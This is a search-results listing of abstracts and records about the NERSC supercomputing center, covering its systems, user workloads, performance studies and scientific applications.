Sample records for computing center nersc

  1. National Energy Research Scientific Computing Center

    Science.gov Websites

    Overview NERSC Mission Contact us Staff Org Chart NERSC History NERSC Stakeholders Usage and User HPC Requirements Reviews NERSC HPC Achievement Awards User Submitted Research Citations NERSC User data archive NERSC Resources Table For Users Live Status User Announcements My NERSC Getting Started

  2. Accelerating Science with the NERSC Burst Buffer Early User Program

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhimji, Wahid; Bard, Debbie; Romanus, Melissa

    NVRAM-based Burst Buffers are an important part of the emerging HPC storage landscape. The National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory recently installed one of the first Burst Buffer systems as part of its new Cori supercomputer, collaborating with Cray on the development of the DataWarp software. NERSC has a diverse user base comprised of over 6500 users in 700 different projects spanning a wide variety of scientific computing applications. The use-cases of the Burst Buffer at NERSC are therefore also considerable and diverse. We describe here performance measurements and lessons learned from the Burstmore » Buffer Early User Program at NERSC, which selected a number of research projects to gain early access to the Burst Buffer and exercise its capability to enable new scientific advancements. To the best of our knowledge this is the first time a Burst Buffer has been stressed at scale by diverse, real user workloads and therefore these lessons will be of considerable benefit to shaping the developing use of Burst Buffers at HPC centers.« less

  3. Large Scale Computing and Storage Requirements for High Energy Physics

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gerber, Richard A.; Wasserman, Harvey

    2010-11-24

    The National Energy Research Scientific Computing Center (NERSC) is the leading scientific computing facility for the Department of Energy's Office of Science, providing high-performance computing (HPC) resources to more than 3,000 researchers working on about 400 projects. NERSC provides large-scale computing resources and, crucially, the support and expertise needed for scientists to make effective use of them. In November 2009, NERSC, DOE's Office of Advanced Scientific Computing Research (ASCR), and DOE's Office of High Energy Physics (HEP) held a workshop to characterize the HPC resources needed at NERSC to support HEP research through the next three to five years. Themore » effort is part of NERSC's legacy of anticipating users needs and deploying resources to meet those demands. The workshop revealed several key points, in addition to achieving its goal of collecting and characterizing computing requirements. The chief findings: (1) Science teams need access to a significant increase in computational resources to meet their research goals; (2) Research teams need to be able to read, write, transfer, store online, archive, analyze, and share huge volumes of data; (3) Science teams need guidance and support to implement their codes on future architectures; and (4) Projects need predictable, rapid turnaround of their computational jobs to meet mission-critical time constraints. This report expands upon these key points and includes others. It also presents a number of case studies as representative of the research conducted within HEP. Workshop participants were asked to codify their requirements in this case study format, summarizing their science goals, methods of solution, current and three-to-five year computing requirements, and software and support needs. Participants were also asked to describe their strategy for computing in the highly parallel, multi-core environment that is expected to dominate HPC architectures over the next few years. The report includes a section that describes efforts already underway or planned at NERSC that address requirements collected at the workshop. NERSC has many initiatives in progress that address key workshop findings and are aligned with NERSC's strategic plans.« less

  4. Edison - A New Cray Supercomputer Advances Discovery at NERSC

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Dosanjh, Sudip; Parkinson, Dula; Yelick, Kathy

    2014-02-06

    When a supercomputing center installs a new system, users are invited to make heavy use of the computer as part of the rigorous testing. In this video, find out what top scientists have discovered using Edison, a Cray XC30 supercomputer, and how NERSC's newest supercomputer will accelerate their future research.

  5. Edison - A New Cray Supercomputer Advances Discovery at NERSC

    ScienceCinema

    Dosanjh, Sudip; Parkinson, Dula; Yelick, Kathy; Trebotich, David; Broughton, Jeff; Antypas, Katie; Lukic, Zarija, Borrill, Julian; Draney, Brent; Chen, Jackie

    2018-01-16

    When a supercomputing center installs a new system, users are invited to make heavy use of the computer as part of the rigorous testing. In this video, find out what top scientists have discovered using Edison, a Cray XC30 supercomputer, and how NERSC's newest supercomputer will accelerate their future research.

  6. Gyrokinetic micro-turbulence simulations on the NERSC 16-way SMP IBM SP computer: experiences and performance results

    NASA Astrophysics Data System (ADS)

    Ethier, Stephane; Lin, Zhihong

    2001-10-01

    Earlier this year, the National Energy Research Scientific Computing center (NERSC) took delivery of the second most powerful computer in the world. With its 2,528 processors running at a peak performance of 1.5 GFlops, this IBM SP machine has a theoretical performance of almost 3.8 TFlops. To efficiently harness such computing power in one single code is not an easy task and requires a good knowledge of the computer's architecture. Here we present the steps that we followed to improve our gyrokinetic micro-turbulence code GTC in order to take advantage of the new 16-way shared memory nodes of the NERSC IBM SP. Performance results are shown as well as details about the improved mixed-mode MPI-OpenMP model that we use. The enhancements to the code allowed us to tackle much bigger problem sizes, getting closer to our goal of simulating an ITER-size tokamak with both kinetic ions and electrons.(This work is supported by DOE Contract No. DE-AC02-76CH03073 (PPPL), and in part by the DOE Fusion SciDAC Project.)

  7. Python in the NERSC Exascale Science Applications Program for Data

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Ronaghi, Zahra; Thomas, Rollin; Deslippe, Jack

    We describe a new effort at the National Energy Re- search Scientific Computing Center (NERSC) in performance analysis and optimization of scientific Python applications targeting the Intel Xeon Phi (Knights Landing, KNL) many- core architecture. The Python-centered work outlined here is part of a larger effort called the NERSC Exascale Science Applications Program (NESAP) for Data. NESAP for Data focuses on applications that process and analyze high-volume, high-velocity data sets from experimental/observational science (EOS) facilities supported by the US Department of Energy Office of Science. We present three case study applications from NESAP for Data that use Python. These codesmore » vary in terms of “Python purity” from applications developed in pure Python to ones that use Python mainly as a convenience layer for scientists without expertise in lower level programming lan- guages like C, C++ or Fortran. The science case, requirements, constraints, algorithms, and initial performance optimizations for each code are discussed. Our goal with this paper is to contribute to the larger conversation around the role of Python in high-performance computing today and tomorrow, highlighting areas for future work and emerging best practices« less

  8. NERSC Annual Report 2008-2009

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Hules, John; Bashor, Jon; Vu, Linda

    2010-05-28

    This report presents highlights of the research conducted on NERSC computers in a variety of scientific disciplines during the years 2008-2009. It also reports on changes and upgrades to NERSC's systems and services as well as activities of NERSC staff.

  9. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Hules, John

    This 1998 annual report from the National Scientific Energy Research Computing Center (NERSC) presents the year in review of the following categories: Computational Science; Computer Science and Applied Mathematics; and Systems and Services. Also presented are science highlights in the following categories: Basic Energy Sciences; Biological and Environmental Research; Fusion Energy Sciences; High Energy and Nuclear Physics; and Advanced Scientific Computing Research and Other Projects.

  10. Science-Driven Computing: NERSC's Plan for 2006-2010

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Simon, Horst D.; Kramer, William T.C.; Bailey, David H.

    NERSC has developed a five-year strategic plan focusing on three components: Science-Driven Systems, Science-Driven Services, and Science-Driven Analytics. (1) Science-Driven Systems: Balanced introduction of the best new technologies for complete computational systems--computing, storage, networking, visualization and analysis--coupled with the activities necessary to engage vendors in addressing the DOE computational science requirements in their future roadmaps. (2) Science-Driven Services: The entire range of support activities, from high-quality operations and user services to direct scientific support, that enable a broad range of scientists to effectively use NERSC systems in their research. NERSC will concentrate on resources needed to realize the promise ofmore » the new highly scalable architectures for scientific discovery in multidisciplinary computational science projects. (3) Science-Driven Analytics: The architectural and systems enhancements and services required to integrate NERSC's powerful computational and storage resources to provide scientists with new tools to effectively manipulate, visualize, and analyze the huge data sets derived from simulations and experiments.« less

  11. Parallel Scaling Characteristics of Selected NERSC User ProjectCodes

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Skinner, David; Verdier, Francesca; Anand, Harsh

    This report documents parallel scaling characteristics of NERSC user project codes between Fiscal Year 2003 and the first half of Fiscal Year 2004 (Oct 2002-March 2004). The codes analyzed cover 60% of all the CPU hours delivered during that time frame on seaborg, a 6080 CPU IBM SP and the largest parallel computer at NERSC. The scale in terms of concurrency and problem size of the workload is analyzed. Drawing on batch queue logs, performance data and feedback from researchers we detail the motivations, benefits, and challenges of implementing highly parallel scientific codes on current NERSC High Performance Computing systems.more » An evaluation and outlook of the NERSC workload for Allocation Year 2005 is presented.« less

  12. Understanding Aprun Use Patterns

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Lin, Hwa-Chun Wendy

    2009-05-06

    On the Cray XT, aprun is the command to launch an application to a set of compute nodes reserved through the Application Level Placement Scheduler (ALPS). At the National Energy Research Scientific Computing Center (NERSC), interactive aprun is disabled. That is, invocations of aprun have to go through the batch system. Batch scripts can and often do contain several apruns which either use subsets of the reserved nodes in parallel, or use all reserved nodes in consecutive apruns. In order to better understand how NERSC users run on the XT, it is necessary to associate aprun information with jobs. Itmore » is surprisingly more challenging than it sounds. In this paper, we describe those challenges and how we solved them to produce daily per-job reports for completed apruns. We also describe additional uses of the data, e.g. adjusting charging policy accordingly or associating node failures with jobs/users, and plans for enhancements.« less

  13. Using NERSC High-Performance Computing (HPC) systems for high-energy nuclear physics applications with ALICE

    NASA Astrophysics Data System (ADS)

    Fasel, Markus

    2016-10-01

    High-Performance Computing Systems are powerful tools tailored to support large- scale applications that rely on low-latency inter-process communications to run efficiently. By design, these systems often impose constraints on application workflows, such as limited external network connectivity and whole node scheduling, that make more general-purpose computing tasks, such as those commonly found in high-energy nuclear physics applications, more difficult to carry out. In this work, we present a tool designed to simplify access to such complicated environments by handling the common tasks of job submission, software management, and local data management, in a framework that is easily adaptable to the specific requirements of various computing systems. The tool, initially constructed to process stand-alone ALICE simulations for detector and software development, was successfully deployed on the NERSC computing systems, Carver, Hopper and Edison, and is being configured to provide access to the next generation NERSC system, Cori. In this report, we describe the tool and discuss our experience running ALICE applications on NERSC HPC systems. The discussion will include our initial benchmarks of Cori compared to other systems and our attempts to leverage the new capabilities offered with Cori to support data-intensive applications, with a future goal of full integration of such systems into ALICE grid operations.

  14. NERSC News

    Science.gov Websites

    Performance Data, Analytics & Services Job Logs & Statistics Training & Tutorials Software Outages NERSC Training Spectrum Scale User Group Meeting Live Status Now Computing Queue Look MOTD » Deep Learning at 15 PFlops Enables Training for Extreme Weather Identification at Scale March 29, 2018

  15. High Performance Computing and Storage Requirements for Nuclear Physics: Target 2017

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Gerber, Richard; Wasserman, Harvey

    2014-04-30

    In April 2014, NERSC, ASCR, and the DOE Office of Nuclear Physics (NP) held a review to characterize high performance computing (HPC) and storage requirements for NP research through 2017. This review is the 12th in a series of reviews held by NERSC and Office of Science program offices that began in 2009. It is the second for NP, and the final in the second round of reviews that covered the six Office of Science program offices. This report is the result of that review

  16. Exploring the role of pendant amines in transition metal complexes for the reduction of N2 to hydrazine and ammonia

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhattacharya, Papri; Prokopchuk, Demyan E.; Mock, Michael T.

    2017-03-01

    This review examines the synthesis and acid reactivity of transition metal dinitrogen complexes bearing diphosphine ligands containing pendant amine groups in the second coordination sphere. This manuscript is a review of the work performed in the Center for Molecular Electrocatalysis. This work was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Research Center funded by the U.S. Department of Energy (U.S. DOE), Office of Science, Office of Basic Energy Sciences. EPR studies on Fe were performed using EMSL, a national scientific user facility sponsored by the DOE’s Office of Biological and Environmental Research and located atmore » PNNL. Computational resources were provided by the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific Northwest National Laboratory is operated by Battelle for the U.S. DOE.« less

  17. Integrating Grid Services into the Cray XT4 Environment

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    NERSC; Cholia, Shreyas; Lin, Hwa-Chun Wendy

    2009-05-01

    The 38640 core Cray XT4"Franklin" system at the National Energy Research Scientific Computing Center (NERSC) is a massively parallel resource available to Department of Energy researchers that also provides on-demand grid computing to the Open Science Grid. The integration of grid services on Franklin presented various challenges, including fundamental differences between the interactive and compute nodes, a stripped down compute-node operating system without dynamic library support, a shared-root environment and idiosyncratic application launching. Inour work, we describe how we resolved these challenges on a running, general-purpose production system to provide on-demand compute, storage, accounting and monitoring services through generic gridmore » interfaces that mask the underlying system-specific details for the end user.« less

  18. Deploying Server-side File System Monitoring at NERSC

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Uselton, Andrew

    2009-05-01

    The Franklin Cray XT4 at the NERSC center was equipped with the server-side I/O monitoring infrastructure Cerebro/LMT, which is described here in detail. Insights gained from the data produced include a better understanding of instantaneous data rates during file system testing, file system behavior during regular production time, and long-term average behaviors. Information and insights gleaned from this monitoring support efforts to proactively manage the I/O infrastructure on Franklin. A simple model for I/O transactions is introduced and compared with the 250 million observations sent to the LMT database from August 2008 to February 2009.

  19. The Hopper System: How the Largest XE6 in the World Went From Requirements to Reality.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Antypas, Katie; Butler, Tina; Carter, Jonathan

    This paper will discuss the entire process of acquiring and deploying Hopper from the first vendor market surveys to providing 3.8 million hours of production cycles per day for NERSC users. Installing the latest system at NERSC has been both a logistical and technical adventure. Balancing compute requirements with power, cooling, and space limitations drove the initial choice and configuration of the XE6, and a number of first-of- a-kind features implemented in collaboration with Cray have resulted in a high performance, usable, and reliable system.

  20. Relativistic Collisions of Highly-Charged Ions

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Ionescu, Dorin; Belkacem, Ali

    1998-11-19

    The physics of elementary atomic processes in relativistic collisions between highly-charged ions and atoms or other ions is briefly discussed, and some recent theoretical and experimental results in this field are summarized. They include excitation, capture, ionization, and electron-positron pair creation. The numerical solution of the two-center Dirac equation in momentum space is shown to be a powerful nonperturbative method for describing atomic processes in relativistic collisions involving heavy and highly-charged ions. By propagating negative-energy wave packets in time the evolution of the QED vacuum around heavy ions in relativistic motion is investigated. Recent results obtained from numerical calculations usingmore » massively parallel processing on the Cray-T3E supercomputer of the National Energy Research Scientific Computer Center (NERSC) at Berkeley National Laboratory are presented.« less

  1. Planck Surveyor On Its Way to Orbit

    ScienceCinema

    None

    2017-12-09

    An Ariane 5 rocket carried the Planck Surveyor and a companion satellite into space May 14, 2009 from the European Space Agency (ESA) base on the northwest coast of South America. Once in orbit beyond the moon, Planck will produce the most accurate measurements ever made of the relic radiation from the big bang, plus the largest set of CMB data ever recorded. Berkeley Labs long and continuing involvement with Planck began when George Smoot of the Physics Division proposed Plancks progenitor to ESA and continues with preparations for ongoing data analysis for the U.S. Planck team at NERSC, led by Julian Borrill, co-leader of the Computational Cosmology Center

  2. Transport properties of two-dimensional metal-phthalocyanine junctions: An ab initio study

    NASA Astrophysics Data System (ADS)

    Liu, Shuang-Long; Wang, Yun-Peng; Li, Xiang-Guo; Cheng, Hai-Ping

    We study two dimensional (2D) electronic/spintronic junctions made of metal-organic frameworks via first-principles simulation. The system consists of two Mn-phthalocyanine leads and a Ni-phthalocyanine center. A 2D Mn phthalocyanine sheet is ferromagnetic half metal and a 2D Ni phthalocyanine sheet is nonmagnetic semiconductor. Our results show that this system has a large tunnel magnetic resistance. The transmission coefficient at Fermi energy decays exponentially with the length of the central region which is not surprising. However, the transmission of the junction can be tuned using gate voltage by up to two orders of magnitude. The origin of the change lies in the mode matching between the lead and the center electronic states. Moreover, the threshold gate voltage varies with the length of the center region which provides a way of engineering the transport properties. Finally, we combine non-equilibrium Green's function and Boltzmann transport equation to compute conductance of the junction. This work was supported by the US Department of Energy (DOE), Office of Basic Energy Sciences (BES), under Contract No. DE-FG02-02ER45995. Computations were done using the utilities of NERSC and University of Florida Research Computing.

  3. Structure and Dynamics Ionic Block co-Polymer Melts: Computational Study

    NASA Astrophysics Data System (ADS)

    Aryal, Dipak; Perahia, Dvora; Grest, Gary S.

    Tethering ionomer blocks into co-polymers enables engineering of polymeric systems designed to encompass transport while controlling structure. Here the structure and dynamics of symmetric pentablock copolymers melts are probed by fully atomistic molecular dynamics simulations. The center block consists of randomly sulfonated polystyrene with sulfonation fractions f = 0 to 0.55 tethered to a hydrogenated polyisoprene (PI), end caped with poly(t-butyl styrene). We find that melts with f = 0.15 and 0.30 consist of isolated ionic clusters whereas melts with f = 0.55 exhibit a long-range percolating ionic network. Similar to polystyrene sulfonate, a small number of ionic clusters slow the mobility of the center of mass of the co-polymer, however, formation of the ionic clusters is slower and they are often intertwined with PI segments. Surprisingly, the segmental dynamics of the other blocks are also affected. NSF DMR-1611136; NERSC; Palmetto Cluster Clemson University; Kraton Polymers US, LLC.

  4. Resource-Efficient, Hierarchical Auto-Tuning of a Hybrid Lattice Boltzmann Computation on the Cray XT4

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Computational Research Division, Lawrence Berkeley National Laboratory; NERSC, Lawrence Berkeley National Laboratory; Computer Science Department, University of California, Berkeley

    2009-05-04

    We apply auto-tuning to a hybrid MPI-pthreads lattice Boltzmann computation running on the Cray XT4 at National Energy Research Scientific Computing Center (NERSC). Previous work showed that multicore-specific auto-tuning can improve the performance of lattice Boltzmann magnetohydrodynamics (LBMHD) by a factor of 4x when running on dual- and quad-core Opteron dual-socket SMPs. We extend these studies to the distributed memory arena via a hybrid MPI/pthreads implementation. In addition to conventional auto-tuning at the local SMP node, we tune at the message-passing level to determine the optimal aspect ratio as well as the correct balance between MPI tasks and threads permore » MPI task. Our study presents a detailed performance analysis when moving along an isocurve of constant hardware usage: fixed total memory, total cores, and total nodes. Overall, our work points to approaches for improving intra- and inter-node efficiency on large-scale multicore systems for demanding scientific applications.« less

  5. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Koniges, A.E.

    The author describes the new T3D parallel computer at NERSC. The adaptive mesh ICF3D code is one of the current applications being ported and developed for use on the T3D. It has been stressed in other papers in this proceedings that the development environment and tools available on the parallel computer is similar to any planned for the future including networks of workstations.

  6. Ammonia Oxidation by Abstraction of Three Hydrogen Atoms from a Mo–NH 3 Complex

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bhattacharya, Papri; Heiden, Zachariah M.; Wiedner, Eric S.

    We report ammonia oxidation by homolytic cleavage of all three H atoms from a Mo-15NH3 complex using the 2,4,6-tri-tert-butylphenoxyl radical to afford a Mo-alkylimido (Mo=15NR) complex (R = 2,4,6-tri-t-butylcyclohexa-2,5-dien-1-one). Reductive cleavage of Mo=15NR generates a terminal Mo≡N nitride, and a [Mo-15NH]+ complex is formed by protonation. Computational analysis describes the energetic profile for the stepwise removal of three H atoms from the Mo-15NH3 complex and the formation of Mo=15NR. Acknowledgment. This work was supported as part of the Center for Molecular Electrocatalysis, an Energy Frontier Re-search Center funded by the U.S. Department of Energy (U.S. DOE), Office of Science, Officemore » of Basic Energy Sciences. EPR and mass spectrometry experiments were performed using EMSL, a national scientific user facility sponsored by the DOE’s Office of Biological and Environmental Research and located at PNNL. The authors thank Dr. Eric D. Walter and Dr. Rosalie Chu for assistance in performing EPR and mass spectroscopy analysis, respectively. Computational resources provided by the National Energy Re-search Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory. Pacific North-west National Laboratory is operated by Battelle for the U.S. DOE.« less

  7. HF Surface Wave Radar for Oceanography -- A Review of Activities in Germany

    DTIC Science & Technology

    2005-04-14

    Environmental and Remote Sensing Center (NERSC). The model and data assimilation technique is described by Breivik and Sætra [2]. Figure 10 shows a...forecasts with the measurements taken at that time, the rms error increases to 20 cm/s. Breivik and Sætra, 2001, present scatter plots and correlations

  8. The Magellan Final Report on Cloud Computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    ,; Coghlan, Susan; Yelick, Katherine

    The goal of Magellan, a project funded through the U.S. Department of Energy (DOE) Office of Advanced Scientific Computing Research (ASCR), was to investigate the potential role of cloud computing in addressing the computing needs for the DOE Office of Science (SC), particularly related to serving the needs of mid- range computing and future data-intensive computing workloads. A set of research questions was formed to probe various aspects of cloud computing from performance, usability, and cost. To address these questions, a distributed testbed infrastructure was deployed at the Argonne Leadership Computing Facility (ALCF) and the National Energy Research Scientific Computingmore » Center (NERSC). The testbed was designed to be flexible and capable enough to explore a variety of computing models and hardware design points in order to understand the impact for various scientific applications. During the project, the testbed also served as a valuable resource to application scientists. Applications from a diverse set of projects such as MG-RAST (a metagenomics analysis server), the Joint Genome Institute, the STAR experiment at the Relativistic Heavy Ion Collider, and the Laser Interferometer Gravitational Wave Observatory (LIGO), were used by the Magellan project for benchmarking within the cloud, but the project teams were also able to accomplish important production science utilizing the Magellan cloud resources.« less

  9. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fadika, Zacharia; Dede, Elif; Govindaraju, Madhusudhan

    MapReduce is increasingly becoming a popular framework, and a potent programming model. The most popular open source implementation of MapReduce, Hadoop, is based on the Hadoop Distributed File System (HDFS). However, as HDFS is not POSIX compliant, it cannot be fully leveraged by applications running on a majority of existing HPC environments such as Teragrid and NERSC. These HPC environments typicallysupport globally shared file systems such as NFS and GPFS. On such resourceful HPC infrastructures, the use of Hadoop not only creates compatibility issues, but also affects overall performance due to the added overhead of the HDFS. This paper notmore » only presents a MapReduce implementation directly suitable for HPC environments, but also exposes the design choices for better performance gains in those settings. By leveraging inherent distributed file systems' functions, and abstracting them away from its MapReduce framework, MARIANE (MApReduce Implementation Adapted for HPC Environments) not only allows for the use of the model in an expanding number of HPCenvironments, but also allows for better performance in such settings. This paper shows the applicability and high performance of the MapReduce paradigm through MARIANE, an implementation designed for clustered and shared-disk file systems and as such not dedicated to a specific MapReduce solution. The paper identifies the components and trade-offs necessary for this model, and quantifies the performance gains exhibited by our approach in distributed environments over Apache Hadoop in a data intensive setting, on the Magellan testbed at the National Energy Research Scientific Computing Center (NERSC).« less

  10. Computational Science: A Research Methodology for the 21st Century

    NASA Astrophysics Data System (ADS)

    Orbach, Raymond L.

    2004-03-01

    Computational simulation - a means of scientific discovery that employs computer systems to simulate a physical system according to laws derived from theory and experiment - has attained peer status with theory and experiment. Important advances in basic science are accomplished by a new "sociology" for ultrascale scientific computing capability (USSCC), a fusion of sustained advances in scientific models, mathematical algorithms, computer architecture, and scientific software engineering. Expansion of current capabilities by factors of 100 - 1000 open up new vistas for scientific discovery: long term climatic variability and change, macroscopic material design from correlated behavior at the nanoscale, design and optimization of magnetic confinement fusion reactors, strong interactions on a computational lattice through quantum chromodynamics, and stellar explosions and element production. The "virtual prototype," made possible by this expansion, can markedly reduce time-to-market for industrial applications such as jet engines and safer, more fuel efficient cleaner cars. In order to develop USSCC, the National Energy Research Scientific Computing Center (NERSC) announced the competition "Innovative and Novel Computational Impact on Theory and Experiment" (INCITE), with no requirement for current DOE sponsorship. Fifty nine proposals for grand challenge scientific problems were submitted for a small number of awards. The successful grants, and their preliminary progress, will be described.

  11. Extended Subject Access to Hypertext Online Documentation. Parts I and II: The Search-Support and Maintenance Problems.

    ERIC Educational Resources Information Center

    Girill, T. R.; And Others

    1991-01-01

    Describes enhancements made to a hypertext information retrieval system at the National Energy Research Supercomputer Center (NERSC) called DFT (Document, Find, and Theseus). The enrichment of DFT's entry vocabulary is described, DFT and other hypertext systems are compared, and problems that occur due to the need for frequent updates are…

  12. Evaluating the networking characteristics of the Cray XC-40 Intel Knights Landing-based Cori supercomputer at NERSC

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Doerfler, Douglas; Austin, Brian; Cook, Brandon

    There are many potential issues associated with deploying the Intel Xeon Phi™ (code named Knights Landing [KNL]) manycore processor in a large-scale supercomputer. One in particular is the ability to fully utilize the high-speed communications network, given that the serial performance of a Xeon Phi TM core is a fraction of a Xeon®core. In this paper, we take a look at the trade-offs associated with allocating enough cores to fully utilize the Aries high-speed network versus cores dedicated to computation, e.g., the trade-off between MPI and OpenMP. In addition, we evaluate new features of Cray MPI in support of KNL,more » such as internode optimizations. We also evaluate one-sided programming models such as Unified Parallel C. We quantify the impact of the above trade-offs and features using a suite of National Energy Research Scientific Computing Center applications.« less

  13. Understanding the I/O Performance Gap Between Cori KNL and Haswell

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Liu, Jialin; Koziol, Quincey; Tang, Houjun

    2017-05-01

    The Cori system at NERSC has two compute partitions with different CPU architectures: a 2,004 node Haswell partition and a 9,688 node KNL partition, which ranked as the 5th most powerful and fastest supercomputer on the November 2016 Top 500 list. The compute partitions share a common storage configuration, and understanding the IO performance gap between them is important, impacting not only to NERSC/LBNL users and other national labs, but also to the relevant hardware vendors and software developers. In this paper, we have analyzed performance of single core and single node IO comprehensively on the Haswell and KNL partitions,more » and have discovered the major bottlenecks, which include CPU frequencies and memory copy performance. We have also extended our performance tests to multi-node IO and revealed the IO cost difference caused by network latency, buffer size, and communication cost. Overall, we have developed a strong understanding of the IO gap between Haswell and KNL nodes and the lessons learned from this exploration will guide us in designing optimal IO solutions in many-core era.« less

  14. LLNL Scientists Use NERSC to Advance Global Aerosol Simulations

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bergmann, D J; Chuang, C; Rotman, D

    2004-10-13

    While ''greenhouse gases'' have been the focus of climate change research for a number of years, DOE's ''Aerosol Initiative'' is now examining how aerosols (small particles of approximately micron size) affect the climate on both a global and regional scale. Scientists in the Atmospheric Science Division at Lawrence Livermore National Laboratory (LLNL) are using NERSC's IBM supercomputer and LLNL's IMPACT (atmospheric chemistry) model to perform simulations showing the historic effects of sulfur aerosols at a finer spatial resolution than ever done before. Simulations were carried out for five decades, from the 1950s through the 1990s. The results clearly show themore » effects of the changing global pattern of sulfur emissions. Whereas in 1950 the United States emitted 41 percent of the world's sulfur aerosols, this figure had dropped to 15 percent by 1990, due to conservation and anti-pollution policies. By contrast, the fraction of total sulfur emissions of European origin has only dropped by a factor of 2 and the Asian emission fraction jumped six fold during the same time, from 7 percent in 1950 to 44 percent in 1990. Under a special allocation of computing time provided by the Office of Science INCITE (Innovative and Novel Computational Impact on Theory and Experiment) program, Dan Bergmann, working with a team of LLNL scientists including Cathy Chuang, Philip Cameron-Smith, and Bala Govindasamy, was able to carry out a large number of calculations during the past month, making the aerosol project one of the largest users of NERSC resources. The applications ran on 128 and 256 processors. The objective was to assess the effects of anthropogenic (man-made) sulfate aerosols. The IMPACT model calculates the rate at which SO{sub 2} (a gas emitted by industrial activity) is oxidized and forms particles known as sulfate aerosols. These particles have a short lifespan in the atmosphere, often washing out in about a week. This means that their effects on climate tend to be more regional, occurring near the area where the SO{sub 2} is emitted. To accurately study these regional effects, Bergmann needed to run the simulations at a finer horizontal resolution, as the coarser resolution (typically 300km by 300km) of other climate models are insufficient for studying changes on a regional scale. Livermore's use of CAM3, the Community Atmospheric Model which is a high-resolution climate model developed at NCAR (with collaboration from DOE), allows a 100km by 100km grid to be applied. NERSC's terascale computing capability provided the needed computational horsepower to run the application at the finer level.« less

  15. Analysis, tuning and comparison of two general sparse solvers for distributed memory computers

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Amestoy, P.R.; Duff, I.S.; L'Excellent, J.-Y.

    2000-06-30

    We describe the work performed in the context of a Franco-Berkeley funded project between NERSC-LBNL located in Berkeley (USA) and CERFACS-ENSEEIHT located in Toulouse (France). We discuss both the tuning and performance analysis of two distributed memory sparse solvers (superlu from Berkeley and mumps from Toulouse) on the 512 processor Cray T3E from NERSC (Lawrence Berkeley National Laboratory). This project gave us the opportunity to improve the algorithms and add new features to the codes. We then quite extensively analyze and compare the two approaches on a set of large problems from real applications. We further explain the main differencesmore » in the behavior of the approaches on artificial regular grid problems. As a conclusion to this activity report, we mention a set of parallel sparse solvers on which this type of study should be extended.« less

  16. Evaluating and optimizing the NERSC workload on Knights Landing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Barnes, T; Cook, B; Deslippe, J

    2017-01-30

    NERSC has partnered with 20 representative application teams to evaluate performance on the Xeon-Phi Knights Landing architecture and develop an application-optimization strategy for the greater NERSC workload on the recently installed Cori system. In this article, we present early case studies and summarized results from a subset of the 20 applications highlighting the impact of important architecture differences between the Xeon-Phi and traditional Xeon processors. We summarize the status of the applications and describe the greater optimization strategy that has formed.

  17. Evaluating and Optimizing the NERSC Workload on Knights Landing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Barnes, Taylor; Cook, Brandon; Doerfler, Douglas

    2016-01-01

    NERSC has partnered with 20 representative application teams to evaluate performance on the Xeon-Phi Knights Landing architecture and develop an application-optimization strategy for the greater NERSC workload on the recently installed Cori system. In this article, we present early case studies and summarized results from a subset of the 20 applications highlighting the impact of important architecture differences between the Xeon-Phi and traditional Xeon processors. We summarize the status of the applications and describe the greater optimization strategy that has formed.

  18. Theoretical Comparison Between Candidates for Dark Matter

    NASA Astrophysics Data System (ADS)

    McKeough, James; Hira, Ajit; Valdez, Alexandra

    2017-01-01

    Since the generally-accepted view among astrophysicists is that the matter component of the universe is mostly dark matter, the search for dark matter particles continues unabated. The Large Underground Xenon (LUX) improvements, aided by advanced computer simulations at the U.S. Department of Energy's Lawrence Berkeley National Laboratory's (Berkeley Lab) National Energy Research Scientific Computing Center (NERSC) and Brown University's Center for Computation and Visualization (CCV), can potentially eliminate some particle models of dark matter. Generally, the proposed candidates can be put in three categories: baryonic dark matter, hot dark matter, and cold dark matter. The Lightest Supersymmetric Particle(LSP) of supersymmetric models is a dark matter candidate, and is classified as a Weakly Interacting Massive Particle (WIMP). Similar to the cosmic microwave background radiation left over from the Big Bang, there is a background of low-energy neutrinos in our Universe. According to some researchers, these may be the explanation for the dark matter. One advantage of the Neutrino Model is that they are known to exist. Dark matter made from neutrinos is termed ``hot dark matter''. We formulate a novel empirical function for the average density profile of cosmic voids, identified via the watershed technique in ΛCDM N-body simulations. This function adequately treats both void size and redshift, and describes the scale radius and the central density of voids. We started with a five-parameter model. Our research is mainly on LSP and Neutrino models.

  19. Multi-threaded ATLAS simulation on Intel Knights Landing processors

    NASA Astrophysics Data System (ADS)

    Farrell, Steven; Calafiura, Paolo; Leggett, Charles; Tsulaia, Vakhtang; Dotti, Andrea; ATLAS Collaboration

    2017-10-01

